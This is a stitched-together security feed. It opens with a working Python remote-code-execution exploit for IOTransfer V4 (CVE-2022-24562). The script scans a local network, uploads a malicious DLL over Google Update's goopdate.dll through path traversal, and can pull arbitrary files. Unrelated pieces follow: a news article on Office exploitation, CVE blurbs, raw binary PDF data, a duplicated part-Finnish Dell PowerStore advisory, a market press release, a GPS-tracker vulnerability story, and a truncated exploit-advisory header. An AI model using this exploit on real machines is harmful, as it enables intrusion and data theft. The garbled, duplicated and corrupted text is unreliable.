IOTransfer version 4.0 suffers from a remote code execution vulnerability.

# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)# Date: 06/22/2022# Exploit Author: Tomer Peled# Vendor Homepage: https://www.iobit.com# Software Link: https://iotransfer.itopvpn.com/# Version: V4 and onward# Tested on: Windows 10# CVE : 2022-24562# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562import osfrom urllib3.exceptions import ConnectTimeoutErrorfrom win32com.client import *import requestsimport jsonlocalPayloadPath = r"c:\temp\malicious.dll"remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'Range = "192.168.89"UpOrDown="Upload"IP = ""UserName = ""def get_version_number(file_path): information_parser = Dispatch("Scripting.FileSystemObject") version = information_parser.GetFileVersion(file_path) return versiondef getTaskList(IP, taskid=""): print("Getting task list...") url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*' res = requests.get(url) tasks = json.loads(res.content) tasks = json.loads(tasks['content']) for task in tasks['tasks']: if taskid == task['taskid']: print(f"Task ID found: {taskid}")def CreateUploadTask(IP): SetSavePath(IP) url = f'http://{IP}:7193/index.php?action=createtask' task = { 'method': 'get', 'version': '1', 'userid': '*', 'taskstate': '0', } res = requests.post(url, json=task) task = json.loads(res.content) task = json.loads(task['content']) taskid = task['taskid'] print(f"[*] TaskID: {taskid}") return taskiddef CreateUploadDetailNode(IP, taskid, remotePath, size='100'): url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0' file_info = { 'size': size, 'savefilename': remotePath, 'name': remotePath, 'fullpath': r'c:\windows\system32\calc.exe', 'md5': 'md5md5md5md5md5', 'filetype': '3', } res = requests.post(url, json=file_info) js = json.loads(res.content) print(f"[V] Create Detail returned: {js['code']}")def readFile(Path): file = open(Path, "rb") byte = file.read(1) next = "Start" while next != b'': byte = byte + file.read(1023) next = file.read(1) if next != b'': byte = byte + next file.close() return bytedef CallUpload(IP, taskid, localPayloadPath): url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0' send_data = readFile(localPayloadPath) try: res = requests.post(url, data=send_data) js = json.loads(res.content) if js['code'] == 200: print("[V] Success payload uploaded!") else: print(f"CreateRemoteFile: {res.content}") except: print("[*] Reusing the task...") res = requests.post(url, data=send_data) js = json.loads(res.content) if js['code'] == 200 or "false" in js['error']: print("[V] Success payload uploaded!") else: print(f"[X] CreateRemoteFile Failed: {res.content}")def SetSavePath(IP): url = f'http://{IP}:7193/index.php?action=setiotconfig' config = { 'tasksavepath': 'C:\\Program ' } requests.post(url, json=config)def ExploitUpload(IP,payloadPath,rPath,taskid =None): if not taskid: taskid = CreateUploadTask(IP) size = os.path.getsize(payloadPath) CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size)) CallUpload(IP, taskid, payloadPath)def CreateDownloadTask(IP, Path) -> str: url = f'http://{IP}:7193/index.php?action=createtask' task = { 'method': 'get', 'version': '1', 'userid': '*', 'taskstate': '0', 'filepath': Path } res = requests.post(url, json=task) task = json.loads(res.content) task = json.loads(task['content']) taskid = task['taskid'] print(f"TaskID: {taskid}") return taskiddef ExploitDownload(IP, DownloadPath, ID=None): if ID: url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}' else: taskid = CreateDownloadTask(IP, DownloadPath) url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}' res = requests.get(url) return resdef ScanIP(startRange): print("[*] Searching for vulnerable IPs", end='') Current = 142 IP = f"{startRange}.{Current}" VulnerableIP: str = "" UserName: str = "" while Current < 252: print(".", end='') url = f'http://{IP}:7193/index.php?action=getpcname&userid=*' try: res = requests.get(url, timeout=1) js = json.loads(res.content) js2 = json.loads(js['content']) UserName = js2['name'] VulnerableIP=IP print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}") print(f"[!] Vulnerable PC username: {UserName}") return VulnerableIP,UserName except Exception as e: pass except ConnectTimeoutError: pass IP = f"{startRange}.{Current}" Current = Current + 1 return None,Noneif __name__ == '__main__': IP,UserName = ScanIP(Range) if IP is None or UserName is None: print("[X] No vulnerable IP found") exit() print("[*] Starting Exploit...") if UpOrDown == "Upload": print(f"[*]Local Payload Path: {localPayloadPath}") print(f"[*]Remote Upload Path: {remotePayloadPath}") ExploitUpload(IP,localPayloadPath,remotePayloadPath) elif UpOrDown == "Download": print(f"[*] Downloading the file: {remoteDownloadPath}") res = ExploitDownload(IP, remoteDownloadPath) file = open("out.pdf", "wb+") file.write(res.content) file.close()

IOTransfer 4.0 Remote Code Execution

By Deeba Ahmed
Research reveals that around 80% of all malware attacks used MS Office flaws. Atlas VPN has shared its…
This is a post from HackRead.com Read the original post: Microsoft Office Most Exploited Software in Malware Attacks – Report

****Research reveals that around 80% of all malware attacks used MS Office flaws.****

Atlas VPN has shared its findings for Q1 2022, in which the company revealed startling stats about Microsoft Office. Reportedly, Microsoft Office has become the most commonly exploited software in malware attacks.

It is a fact that most Microsoft Office security flaws are publicly known which makes it easy for cybercriminals to exploit them. On the other hand, because most users ignore essential software updates, scammers can easily inject malicious code after exploiting security loopholes.

According to researchers, some Microsoft Office vulnerabilities are being exploited more than others. These include the following:

1.  CVE-2018-0802
2.  CVE-2017-8570
3.  CVE-2017-11882

These flaws allow system infection, execute commands autonomically, and spread malware infection including the nasty Cobalt Strike one. Despite that security updates are available for these vulnerabilities, these still top the list of most exploited flaws. This indicates that users need to ramp up software security to stay protected.

Atlas VPN wrote that around 78.5% of all malware attacks are launched by targeting Microsoft Office vulnerabilities. Per the Q4 2021 data shared by Kaspersky’s malware research platform Securelist, Microsoft was targeted in 61% of the attacks last year.

Therefore, it can be assumed that hackers are increasingly abusing MS Office, and there’s been a rise in software exploitation since last year.

*   Hackers are using Microsoft Teams chat to spread malware
*   Threat actors using Google Docs exploit to spread phishing links
*   Google, Microsoft and Oracle generated most vulnerabilities in 2021
*   Google Drive accounted for 50% of malicious Office document downloads

In contrast, browser exploits have become rare as they are updated automatically. Android (4.1%), Java (3.48%), Adobe Flash (3.49%), and PDF (2.79%) exploits didn’t show any drastic changes in percentages in Q1 2022.

MS Office is a widely used software. Today, over 1.2 billion individuals and companies across 140 countries and 107 languages use Microsoft Office. For this reason alone, ensuring that the software is properly patched and updated is essential. It is also necessary to follow basic cybersecurity practices and always patch the software as soon as an update is available.

Microsoft Office Most Exploited Software in Malware Attacks – Report

Authenticated (custom plugin role) Arbitrary File Read via Export function vulnerability in GiveWP's GiveWP plugin <= 2.20.2 at WordPress.

CVE-2022-31475: GiveWP – Donation Plugin and Fundraising Platform

Cross-Site Request Forgery (CSRF) vulnerability in JoomUnited WP Meta SEO plugin <= 4.4.8 at WordPress allows an attacker to update the social settings.

CVE-2022-30337: WP Meta SEO

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in flow computer and remote controller products of ABB ( RMC-100 (Standard), RMC-100-LITE, XIO, XFCG5 , XRCG5 , uFLOG5 , UDC) allows an attacker who successfully exploited this vulnerability could insert and run arbitrary code in an affected system node.

%PDF-1.4 %���� 1 0 obj << /Author (Billy Barnes) /CreationDate (D:20220714112111-05'00') /Creator (PDF-XChange Office Addin) /CreatorTool (PDF-XChange Standard \$9.3 build 361\$ \[GDI\] \[Windows 10 Enterprise x64 \$Build 19044\$\]) /ModDate (D:20220714112443-05'00') /Producer (PDF-XChange Standard \$9.3 build 361\$ \[GDI\] \[Windows 10 Enterprise x64 \$Build 19044\$\]) /Subject (ABB Flow Computer and Remote Controllers) /Title (Path Traversal Vulnerability in Totalflow TCP protocol can lead to root access) >> endobj 2 0 obj << /Metadata 3 0 R /Outlines 4 0 R /Pages 5 0 R /Type /Catalog >> endobj 3 0 obj << /Length 3581 /Subtype /XML /Type /Metadata >> stream application/pdf Path Traversal Vulnerability in Totalflow TCP protocol can lead to root access ABB Flow Computer and Remote Controllers Billy Barnes uuid:0a28e808-aa9a-4c44-8bee-e5a3aee4eb36 uuid:4e711ea6-5951-4b09-b3e9-e3c08daade21 PDF-XChange Office Addin 2022-07-14T11:21:11-05:00 2022-07-14T11:24:43-05:00 PDF-XChange Standard (9.3 build 361) \[GDI\] \[Windows 10 Enterprise x64 (Build 19044)\] PDF-XChange Standard (9.3 build 361) \[GDI\] \[Windows 10 Enterprise x64 (Build 19044)\] endstream endobj 4 0 obj << /Count 20 /First 6 0 R /Last 7 0 R >> endobj 5 0 obj << /Count 5 /Kids \[8 0 R 9 0 R 10 0 R 11 0 R 12 0 R\] /Type /Pages >> endobj 6 0 obj << /A << /D \[9 0 R /XYZ 63.75 771.5 0\] /S /GoTo >> /C \[0 0 0\] /Next 13 0 R /Parent 4 0 R /Title (Purpose) >> endobj 7 0 obj << /A << /D \[12 0 R /XYZ 63.75 274.25 0\] /S /GoTo >> /C \[0 0 0\] /Parent 4 0 R /Prev 14 0 R /Title (Revision history) >> endobj 8 0 obj << /Contents 15 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 9 0 obj << /Contents 19 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 10 0 obj << /Annots \[20 0 R 21 0 R 22 0 R 23 0 R 24 0 R 25 0 R\] /Contents 26 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 11 0 obj << /Annots \[27 0 R 28 0 R\] /Contents 29 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 12 0 obj << /Annots \[30 0 R 31 0 R 32 0 R\] /Contents 33 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 13 0 obj << /A << /D \[9 0 R /XYZ 63.75 467 0\] /S /GoTo >> /C \[0 0 0\] /Next 34 0 R /Parent 4 0 R /Prev 6 0 R /Title (Affected products) >> endobj 14 0 obj << /A << /D \[12 0 R /XYZ 63.75 383.75 0\] /S /GoTo >> /C \[0 0 0\] /Next 7 0 R /Parent 4 0 R /Prev 35 0 R /Title (Support) >> endobj 15 0 obj << /Filter /FlateDecode /Length 3046 >> stream x�}X�r�F}�W��̖� ��I�\\�Mm�ro��}�ȡ�$�(���\[�=��������u��@�h\`| h(�ʭQJUP5e^5MSװ;mp� 2�r=4�6�������t�ے6����i�IV�F�rU�U<�7h��}:�NQSF��6wn��y��4�EOST"�5=Dwؼ���\[�eA��嵆�vTW�a�j��ɍcX���Y�5>�A����+CP��&G��dDnb��5dM^�� y�0��;�(t>��uB���b��"r\*tp@��T\]#2nE�� S���:�Y�J�,ٿ�2:����b�!g6��Pt9��^|#�\\rrAU��G�I}��\[�Z�B����I��Д���1'?�ˉ<�Yw9�����1�+L��%�� IRbXV�p��2�q'�DO���7���Rހb�2�Cu�+����Y�U�~�Ƞd�Vrʴ��BVӈ��\*\_������l"H"�(��-�Z��P��r9� s�U�5"kR�X� ���0K�!��I�K�25��,�'} Q���X��4N r�T I��, �)vj�nɔh(.P�5��m;A��;���u��QvثU&E�N�:�H, �Ě�7����(����z��%�����F�x=#��ץ�UP-��ϣ���\`� ���>�V��U� ����QD7��6Bj�(�o��\\��֋�:E4�:J��Q6/��tQJS���rE;Þ�Lw&�(V���<�Tg��RCr���l�M\*EGFMu�"���q��|A:,D� �� :��7B�Yz� (�4G���7�e�T�z���tJ'w�X�Q��M@A����,�����nT���7��k8��2�R���e��e��q�� ��m ��\] �c�eI�tc�u��rNF5+p���ˉ��R~���Ah�b5N@�b9���sW���r#�ˆM ��Y-~ �8���"����B�AeД�� �8F�i,G�ZP����d\\��^�46\[.'���� Q�- �d\*�rh�+1I��z�-�\_,��IQlu��Wm�U��͔� ��,Y��d\]Ҁ&\_dg�+ĢK��:\]n�QX-r��VAs)�Y,�h�-S�e�IЪt.�e�P�g)j,qn�T�A:�,����}�.:����)�Jl���oRn�QP�����d��E�3�)�JS"��,F�uGܯȲz5˘

CVE-2022-0902

Dell PowerStore, versions prior to 3.0.0.0, contains an OS Command Injection vulnerability in PowerStore T environment. A locally authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS command on the PowerStore underlying OS. Exploiting may lead to a system take over by an attacker.

**Vaikutus**

Critical

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-31234

Dell PowerStore contains an Improper Restriction of Excessive Authentication Attempts Vulnerability in PowerStore Manager GUI. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to password brute-forcing. Account takeover is possible if weak passwords are used by users.

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-22555

Dell PowerStore contains an OS command injection vulnerability. A locally authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS, with the privileges of the vulnerable application. Exploitation may lead to an elevation of privilege.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVE-2022-32498

Dell PowerStore CLI for Windows has the potential for a DLL highjacking exploit. Exploitation may lead to the execution of arbitrary code.  

5.5

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:L 

CVE-2022-33923

Dell PowerStore contains an OS Command Injection vulnerability in the PowerStore T environment. A locally authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS. Exploiting may lead to a system takeover by an attacker.

6.4

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More Information**

Ansible

CVE-2019-10156

See NVD (http://nvd.nist.gov/) for individual scores of each CVE.

Apache Shiro

CVE-2021-41303

Highcharts JS

CVE-2021-29489

Jinja2

CVE-2019-10906

CVE-2016-10745

CVE-2020-28493

libsndfile

CVE-2021-3246

libX11  
libX11-data

CVE-2021-31535

libexpat

CVE-2022-22822

CVE-2022-22823

CVE-2022-22824

CVE-2022-23852

CVE-2022-23990

CVE-2022-25235

CVE-2022-25236

CVE-2022-25315

Log4j

CVE-2020-9488

CVE-2021-45105

CVE-2021-44832

lxml

CVE-2021-43818

CVE-2021-28957

CVE-2020-27783

netty

CVE-2021-43797

NSS NSPR  
libfreebl3  
libfreebl3-hmac  
libsoftokn3  
libsoftokn3-hmac  
mozilla-nss  
mozilla-nss-certs  
mozilla-nss-tools       
mozilla-nspr

CVE-2020-12403

CVE-2021-43527

numpy

CVE-2021-41496

openssl

CVE-2021-3711

pip

CVE-2019-20916

postgres

CVE-2021-32027

CVE-2021-32028

CVE-2021-3393

CVE-2021-3677

CVE-2021-23222

CVE-2021-23214

Python-3

CVE-2021-25315

CVE-2020-25592

CVE-2020-11651

CVE-2020-11652

CVE-2018-15751

pyyaml

CVE-2020-14343

CVE-2017-18342

ruby

CVE-2020-25613

xterm  
xterm-bin

CVE-2021-27135

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-31234

Dell PowerStore contains an Improper Restriction of Excessive Authentication Attempts Vulnerability in PowerStore Manager GUI. A remote unauthenticated attacker may potentially exploit this vulnerability, leading to password brute-forcing. Account takeover is possible if weak passwords are used by users.

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-22555

Dell PowerStore contains an OS command injection vulnerability. A locally authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS, with the privileges of the vulnerable application. Exploitation may lead to an elevation of privilege.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVE-2022-32498

Dell PowerStore CLI for Windows has the potential for a DLL highjacking exploit. Exploitation may lead to the execution of arbitrary code.  

5.5

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:L 

CVE-2022-33923

Dell PowerStore contains an OS Command Injection vulnerability in the PowerStore T environment. A locally authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the PowerStore underlying OS. Exploiting may lead to a system takeover by an attacker.

6.4

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More Information**

Ansible

CVE-2019-10156

See NVD (http://nvd.nist.gov/) for individual scores of each CVE.

Apache Shiro

CVE-2021-41303

Highcharts JS

CVE-2021-29489

Jinja2

CVE-2019-10906

CVE-2016-10745

CVE-2020-28493

libsndfile

CVE-2021-3246

libX11  
libX11-data

CVE-2021-31535

libexpat

CVE-2022-22822

CVE-2022-22823

CVE-2022-22824

CVE-2022-23852

CVE-2022-23990

CVE-2022-25235

CVE-2022-25236

CVE-2022-25315

Log4j

CVE-2020-9488

CVE-2021-45105

CVE-2021-44832

lxml

CVE-2021-43818

CVE-2021-28957

CVE-2020-27783

netty

CVE-2021-43797

NSS NSPR  
libfreebl3  
libfreebl3-hmac  
libsoftokn3  
libsoftokn3-hmac  
mozilla-nss  
mozilla-nss-certs  
mozilla-nss-tools       
mozilla-nspr

CVE-2020-12403

CVE-2021-43527

numpy

CVE-2021-41496

openssl

CVE-2021-3711

pip

CVE-2019-20916

postgres

CVE-2021-32027

CVE-2021-32028

CVE-2021-3393

CVE-2021-3677

CVE-2021-23222

CVE-2021-23214

Python-3

CVE-2021-25315

CVE-2020-25592

CVE-2020-11651

CVE-2020-11652

CVE-2018-15751

pyyaml

CVE-2020-14343

CVE-2017-18342

ruby

CVE-2020-25613

xterm  
xterm-bin

CVE-2021-27135

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVEs Addressed**

**Products**

**Affected Versions**

**Updated Versions**

**Link to Update**

All CVEs above excluding CVE-2022-32498

PowerStore T OS

PowerStore T OS versions before PowerStore T OS Upgrade 3.0.0.0-1732745

PowerStore T OS Upgrade 3.0.0.0-1732745

https://www.dell.com/support/home/?app=drivers

CVE-2022-32498

PowerStore Command Line Interface (CLI) tool for Windows

PowerStore Command Line Interface (CLI) tool for Linux x64 versions before 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x86 versions before 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x64 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x86 3.0.0.0-1732745

https://www.dell.com/support/home/?app=drivers

**CVEs Addressed**

**Products**

**Affected Versions**

**Updated Versions**

**Link to Update**

All CVEs above excluding CVE-2022-32498

PowerStore T OS

PowerStore T OS versions before PowerStore T OS Upgrade 3.0.0.0-1732745

PowerStore T OS Upgrade 3.0.0.0-1732745

https://www.dell.com/support/home/?app=drivers

CVE-2022-32498

PowerStore Command Line Interface (CLI) tool for Windows

PowerStore Command Line Interface (CLI) tool for Linux x64 versions before 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x86 versions before 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x64 3.0.0.0-1732745

PowerStore Command Line Interface (CLI) tool for Linux x86 3.0.0.0-1732745

https://www.dell.com/support/home/?app=drivers

**Keinoja ongelman kiertämiseen tai lieventämiseen**

**CVE-2022-31234:**  
Configure a long, complex password for the System management account, and change it on a regular basis. See PowerStore Security Configuration Guide (https://dl.dell.com/content/manual52196227-dell-emc-powerstore-security-configuration-guide.pdf) for password requirements. The minimum number of characters is 8 however you should configure a longer than 8 password in order to make it very difficult to brute force.    

**CVE-2022-22555:**  
An attacker requires local access through external SSH; therefore, it is recommended to always leave the external SSH service interface disabled unless it must be used to perform service operations on the appliance. After performing the necessary service operations, disable the SSH interface to ensure that the appliance remains secure. See PowerStore Security Configuration Guide (https://dl.dell.com/content/manual52196227-dell-emc-powerstore-security-configuration-guide.pdf) for detailed information about external SSH access.

**Versiohistoria**

**Revision**

**Date**

**More Information**

1.0

2022-07-07

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

PowerStore, PowerStore 1000T, PowerStore 1200T, PowerStore 3000T, PowerStore 5000T, PowerStore 500T, PowerStore 7000T, PowerStore 9000T, Product Security Information

07 heinäk. 2022

CVE-2022-33923: DSA-2022-159: Dell PowerStore Family Security Update for Multiple Vulnerabilities

CHICAGO, July 20, 2022 /PRNewswire/ -- **Data-centric Security Market** **size is projected to grow from an estimated value of USD 4.2 billion in 2022 to USD 12.3 billion by 2027, at a Compound Annual Growth Rate (CAGR) of 23.9% from 2022 to 2027** **according to a new report by MarketsandMarkets™.** The need to secure most sensitive information (credit card numbers, intellectual property, or medical records), stringent compliances and regulations; the need to secure sensitive data on cloud, and growing data breach incidents is driving the growth of data-centric security market across the globe.

**_Browse in-depth TOC on_** **"Data-centric Security Market"  
362 – Tables  
41 – Figures  
269 – Pages**

**Download Report Brochure:** https://www.marketsandmarkets.com/pdfdownloadNew.asp?id=1504980

**By component, the services segment to register the highest growth rate during the forecast period**

Based on component, data-centric security services have witnessed a growing demand in recent years. The services segment includes various services that are required to deploy, execute, and maintain data-centric security platforms in organizations. Enterprises need support from service providers to enhance their data management, policy control, auditing & reporting, data protection, and for maintaining the governance over various silos. Professional service providers help enterprises in deploying data centric security software and solutions and managing all the queries in the product life cycle.

The professional services are offered through professionals, specialists, or experts to support the business. These services include consulting, designing and development and implementation, and support services. The latest techniques, strategies, and skills adopted by the professionals are said to be helping organizations in adopting data centric security features. They also offer customized implementation and risk assessment and assist with the deployment via industry-defined best practices.

With the increasing demand for data-centric security solutions in high-growth markets such as APAC and MEA, there is a significant demand for training and education services to spread awareness about various data-centric security solutions.

**Request Sample Pages:** https://www.marketsandmarkets.com/requestsampleNew.asp?id=1504980

**Based on organization size, the SMEs segment to grow at the highest CAGR during the forecast period**

By organization size, the data centric security market is sub-segmented into large enterprises and SMEs. SMEs use data centric security solutions to reduce data fraud while enhancing the customer experience. The growing usage of mobile devices has influenced the data transfer over business networks to personal devices, such as mobile phones and laptops. Hence, this helps in increasing the fraudulent data, cyberattacks, data losses, and threat of personal data thefts. These rising security issues have made way for SMEs to focus their concerns on data centric security. Although, SMEs have to consider their limited budget, the comprehension of corporate information being an important consideration, makes them use data discovery and classification, data protection, and data governance solutions. Moreover, these solutions are available at economical pricing in the cloud deployment type. In the coming years, data centric security solutions are expected to witness high adoption among SMEs, all over the region.

**North America to hold the largest market share in 2022**

North America is estimated to account for the highest market share in the data-centric security market in 2022. The region comprises some of the key vendors that offer data-centric security solutions and services; some of them are Informatica, IBM, Broadcom, Micro Focus, Varonis Systems, Forcepoint, among others. By country, the US is expected to hold the largest market share owing to the growing data breach incidents. Implementing these technologies enables large amounts of data to be operated upon, which has resulted in widespread adoption of cloud-based solutions and investments in the data-centric security market. North America is a highly regulated region in the world with numerous regulations and compliances, such as the Federal Energy Regulatory Commission (FERC), HIPAA, PCI DSS, and SOX, across verticals. All these factors contribute to the high market share.

**Speak to Research Expert:** https://www.marketsandmarkets.com/speaktoanalystNew.asp?id=1504980

The major Players in data-centric security market are Informatica (US), IBM (US), Broadcom (US), Micro Focus (US), Varonis Systems (US), Talend (US), Orange Cyberdefense (France), Forcepoint (US), Imperva (US), NetApp (US), Infogix (US), PKWARE (US), Seclore (US), Fasoo (South Korea), Protegrity (US), Egnyte (US), Netwrix (US), Digital Guardian (US), HelpSystems (US), BigID (US), Securiti (US), SecuPi (US), Concentric.AI (US), Lepide (US), NextLabs (US), SealPath (Spain), Nucleus Cyber (US), and Dathena (Singapore).

**Market Players**

Key and innovative vendors in the data-centric security market include Informatica (US), IBM (US), Broadcom (US), Micro Focus (US), Varonis Systems (US), Talend (US), Orange Cyberdefense (France), Forcepoint (US), Imperva (US), NetApp (US), Infogix (US), PKWARE (US), Seclore (US), Fasoo (South Korea), Protegrity (US), Egnyte (US), Netwrix (US), Digital Guardian (US), HelpSystems (US), BigID (US), Securiti (US), SecuPi (US), Concentric.AI (US), Lepide (US), NextLabs (US), SealPath (Spain), Nucleus Cyber (US), and Dathena (Singapore).

**Browse Adjacent Markets:** Information Security Market Research Reports & Consulting

**Related Reports:**

**Data Discovery Market** by Component, Functionality, Organization Size, Deployment Mode, Application, Vertical (BFSI, Healthcare and Life Sciences, Telecommunications and IT, Manufacturing), and Region - Global Forecast to 2025

**Serverless Security Market** by Service Model (BaaS and FaaS), Security Type (Data, Network, Perimeter, and Application), Deployment Mode (Public and Private), Organization Size (SMEs and Large enterprises), Vertical, and Region - Global Forecast to 2026

**About MarketsandMarkets™**

MarketsandMarkets™ provides quantified B2B research on 30,000 high growth niche opportunities/threats which will impact 70% to 80% of worldwide companies' revenues. Currently servicing 7500 customers worldwide including 80% of global Fortune 1000 companies as clients. Almost 75,000 top officers across eight industries worldwide approach MarketsandMarkets™ for their painpoints around revenues decisions.

Our 850 fulltime analyst and SMEs at MarketsandMarkets™ are tracking global high growth markets following the "Growth Engagement Model – GEM". The GEM aims at proactive collaboration with the clients to identify new opportunities, identify most important customers, write "Attack, avoid and defend" strategies, identify sources of incremental revenues for both the company and its competitors. MarketsandMarkets™ now coming up with 1,500 MicroQuadrants (Positioning top players across leaders, emerging companies, innovators, strategic players) annually in high growth emerging segments. MarketsandMarkets™ is determined to benefit more than 10,000 companies this year for their revenue planning and help them take their innovations/disruptions early to the market by providing them research ahead of the curve.

MarketsandMarkets's flagship competitive intelligence and market research platform, "Knowledge Store" connects over 200,000 markets and entire value chains for deeper understanding of the unmet insights along with market sizing and forecasts of niche markets.

Data-Centric Security Market Worth $12.3B by 2027 - Exclusive Report by MarketsandMarkets™

Broader architectural failings of Chinese vendor potentially puts 1.5m devices at risk

Broader architectural failings of Chinese vendor potentially puts 1.5m devices at risk

A raft of zero-day flaws found in a popular automotive GPS tracking device “could have disastrous and even life-threatening implications”, security researchers warn.

Six as-yet-unpatched vulnerabilities unearthed by BitSight researcher Pedro Umbelino affect the API server, GPS tracker protocol, and web server of the MV720 GPS tracker, which was developed by China-based company MiCODUS.

Successful abuse of the bugs could see attackers “cut fuel to an entire fleet of commercial or emergency vehicles”, use GPS data “to monitor and abruptly stop vehicles on dangerous highways”, or “track individuals or demand ransom payments to return disabled vehicles to working condition”, according to research (PDF) from BitSight.

**Huge attack surface**

According to the cybersecurity firm, the MiCODUS MV720 provides theft protection and fleet management functionality to customers in at least in 169 countries, including a Fortune 50 energy company, a national military in South America, a federal government in Western Europe, a national law enforcement agency in Western Europe, and a nuclear power plant operator.

Alarmingly, BitSight said Umbelino also uncovered security issues associated with the firm’s cloud\-based device management interface for the web, iOS, and Android, a finding which means other MiCODUS GPS tracking models could also be insecure. If MiCODUS’ own figures are accurate, that equates to 1.5 million potentially vulnerable devices worldwide.

DON’T MISS ‘Password extraction risk’ in identity provider Okta disputed

With security patches yet to materialize, BitSight has urged users to “immediately stop using or disable any MiCODUS MV720 GPS trackers until a fix is made available”.

A security advisory from the US Cybersecurity and Infrastructure Security Agency (CISA) said that “no known public exploits specifically target these vulnerabilities” in the MV720 GPS tracker.

**Authentication issues**

Two critical authentication issues in the API server, both notching a CVSS score of 9.8, enable “an attacker to send SMS commands directly to the GPS tracker as if they were coming from the GPS owner’s mobile number”.

One bug relates to a hard-coded master password (CVE-2022-2107) and the other, resulting from improper authentication (CVE-2022-2141), potentially enables manipulator-in-the-middle (MitM) attacks.

The devices and the mobile interface are preconfigured with the default password ‘123456’, which BitSight classed as a high severity (CVSS 8.1) issue, although CISA declined to assign a CVE. “There is no mandatory rule to change the password nor is there any claiming process”, according to BitSight, which found that 94.5% of 1,000 responding device IDs still had the default password.

With the device ID easily predictable and the server seemingly lacking password brute force mitigations such as rate-limiting, attackers can easily access random GPS trackers.

Read more of the latest IoT security news

A high severity (CVSS 7.5) reflected cross-site scripting (XSS) vulnerability affecting the main web server, meanwhile, could enable attackers to “fully compromise the device”.

The main web server also contains a pair of authenticated insecure direct object reference vulnerabilities, tracked as CVE-2022-34150 (CVSS 7.1) and CVE-2022-33944 (CVSS 6.5).

“Having a centralized dashboard to monitor GPS trackers with the ability to enable or disable a vehicle, monitor speed, routes and leverage other features” is as potentially dangerous as it is useful, suggested BitSight.

“Unfortunately, the MiCODUS MV720 lacks basic security protections”, and with only “limited testing, BitSight uncovered a multitude of flaws affecting all components of the GPS tracker ecosystem”.

BitSight said it first disclosed the flaws to the vendor on September 9, 2021, and after responding initially, MiCODUS failed to reply to multiple subsequent requests for updates, both from BitSight and CISA. BitSight published its findings yesterday (July 19).

YOU MIGHT ALSO LIKE Jacuzzi customer details could be exposed by SmartTub web bugs, claims researcher

Zero-day flaws in GPS tracker pose surveillance, fuel cut-off risks to vehicles

The home automation solution suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'name' GET parameter in 'delsnap.pl' Perl/CGI script which is used for deleting snapshots taken from the webcam.

Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit 
Advisory ID: ZSL-2022-5710 
Type: Local/Remote 
Impact: System Access, DoS 
Risk: (4/5) 
Release Date: 20.07.2022

**Summary**

